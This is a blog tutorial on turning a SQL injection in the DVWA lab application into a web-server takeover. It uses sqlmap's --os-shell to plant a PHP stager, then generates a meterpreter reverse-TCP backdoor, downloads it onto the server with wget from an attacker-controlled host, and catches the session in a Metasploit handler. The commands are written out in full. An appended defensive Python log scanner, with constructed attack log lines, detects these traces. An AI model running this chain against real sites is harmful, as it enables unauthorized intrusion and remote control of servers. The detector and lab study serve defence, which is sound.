
Take Meterpreter of Website using Sqlmap ( OS-Shell )

Scripted



Hey folks, in this tutorial we will discuss another topic related to the sqlmap tool. If you have not read our previous articles on sqlmap, you should read them first, because all your doubts about database hacking will go away after reading them. We assume that you are familiar with the sqlmap tool and its features, as well as the basics of the SQL injection vulnerability. In this tutorial we will gain access to the web server through a SQL injection vulnerability in a web application, with the help of the “os-shell” feature of the sqlmap tool.

Let’s take a look 🙂 !!

DVWA

We’ll use the DVWA vulnerable web application to demonstrate this feature of the sqlmap tool. If you have not configured this web application yet, you can configure it by going here. When we enter a numeric string in the SQL injection section, we get information about users of the web application, which suggests that the web application is vulnerable to SQL injection.



We will use the HTTP request to dump the database, so we use the Burp Suite tool to capture the HTTP request. Just copy the entire request.



Now we will create a file and paste the entire copied HTTP request into it.


OS Shell

This feature is provided to obtain an operating system shell on the web application’s host (the web server). We just need to add the “--os-shell” option after the HTTP request file and execute the command.

sqlmap -r secnhack --os-shell



Here we have to type 1 to create a PHP backdoor for the remote server and then type 1 to identify a writable file location on the web server.



Amazing 🙂 !! It will try multiple combinations of directories via brute force to identify writable locations. As you can see, we are able to access the web server’s files.


OS-shell to Meterpreter

Now we will create a PHP backdoor with the MSFPC tool, but you can create it with any tool you like. After the payload is created, we rename the file and start a Python HTTP server so the payload can be downloaded via the wget tool.

msfpc PHP 4444
mv /root/php-meterpreter-staged-reverse-tcp-4444.php secnhack.php
python -m SimpleHTTPServer



Now we will return to the web server’s cmd shell and upload our PHP backdoor via the wget command.

wget -N 192.168.1.17:8000/secnhack.php



As you can see, our PHP backdoor has been uploaded to the following location on the web server.



Now we will copy the full location returned by the “pwd” command and paste it into the browser together with the name of the PHP backdoor. Let’s execute it.




Boom 🙂 !! The wait is over: as soon as we open the location of the PHP backdoor in the browser, we get a meterpreter session on the web server.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.17
set lport 4444
run



Likewise, we can use different kinds of payloads and methods to get a meterpreter session on the web server.

About the Author: Shubham Goyal, Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be contacted on LinkedIn.
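
A defender-side view of the steps above, as an added example that is not part of the original post: it scans web server access logs for the traces this workflow leaves behind. The log lines are constructed, and the rules assume sqlmap's default User-Agent, its default tmpu*/tmpb* names for the PHP files it writes, and a cmd query parameter on the uploaded backdoor.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format), not from the original post.
SAMPLE_LOG = "\n".join([
    '192.168.1.17 - - [01/Jan/2021:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '192.168.1.17 - - [01/Jan/2021:10:02:11 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+LIMIT+0%2C1+INTO+OUTFILE+%27%2Fvar%2Fwww%2Fhtml%2Ftmpuabcd.php%27--+-&Submit=Submit HTTP/1.1" 200 1490 "-" "sqlmap/1.x (constructed)"',
    '192.168.1.17 - - [01/Jan/2021:10:02:15 +0000] "GET /tmpbwxyz.php?cmd=pwd HTTP/1.1" 200 61 "-" "sqlmap/1.x (constructed)"',
    '192.168.1.17 - - [01/Jan/2021:10:05:40 +0000] "GET /tmpbwxyz.php?cmd=wget+-N+192.168.1.17%3A8000%2Fsecnhack.php HTTP/1.1" 200 74 "-" "Mozilla/5.0"',
])

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Each rule: (name, field it inspects, pattern). The User-Agent and file names
# are sqlmap defaults (assumption: the operator left them unchanged).
RULES = [
    ("sqlmap-user-agent", "ua", re.compile(r"sqlmap/", re.I)),
    ("sql-file-write", "query", re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I)),
    ("sqlmap-stager-path", "path", re.compile(r"/tmp[ub][a-z]{4,}\.php$")),
    ("webshell-cmd-param", "rawq", re.compile(r"(?:^|&)cmd=", re.I)),
]

def scan(log_text):
    """Return [(line_number, client_ip, [rule names])] for lines that match a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, url, ua = m.groups()
        path, _, query = url.partition("?")
        # SQL keywords are matched on the decoded query; parameter names are
        # matched on the raw query so an encoded '&' cannot fake a parameter.
        fields = {"ua": ua, "path": path, "rawq": query, "query": unquote_plus(query)}
        names = [name for name, field, rx in RULES if rx.search(fields[field])]
        if names:
            hits.append((n, ip, names))
    return hits

if __name__ == "__main__":
    for n, ip, names in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {', '.join(names)}")
```

Because each rule fires independently, the last sample line is still flagged by its path and parameter even though its User-Agent is not sqlmap's.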
 
